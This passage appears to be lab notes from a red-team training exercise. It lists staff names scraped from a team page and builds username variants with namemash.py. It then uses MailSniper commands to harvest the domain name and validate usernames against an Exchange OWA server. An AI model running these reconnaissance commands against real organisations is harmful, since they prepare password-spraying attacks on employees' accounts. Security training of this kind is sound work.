Now let’s enumerate the target usernames.
<https://cyberbotic.io/our-team/>

now we got some usernames.
Bob Farmer
Isabel Yates
John King
Joyce Adams
Now let’s make combinations.
python3 namemash.py names.txt > comb.txt

Now let’s import the MailSniper Script
Import-Module .\\MailSniper.ps1

Enumerating the netbios name for the domain
Invoke-DomainHarvestOWA -ExchHostname mail.cyberbotic.io

Now let’s validate the usernames on the exchange server.
Invoke-UsernameHarvestOWA -ExchHostname mail.cyberbotic.io -Domain cyberbotic.io -UserList possible.txt -OutFile valid.txt

Now let’s see the valid usernames.
type .\\valid.txt
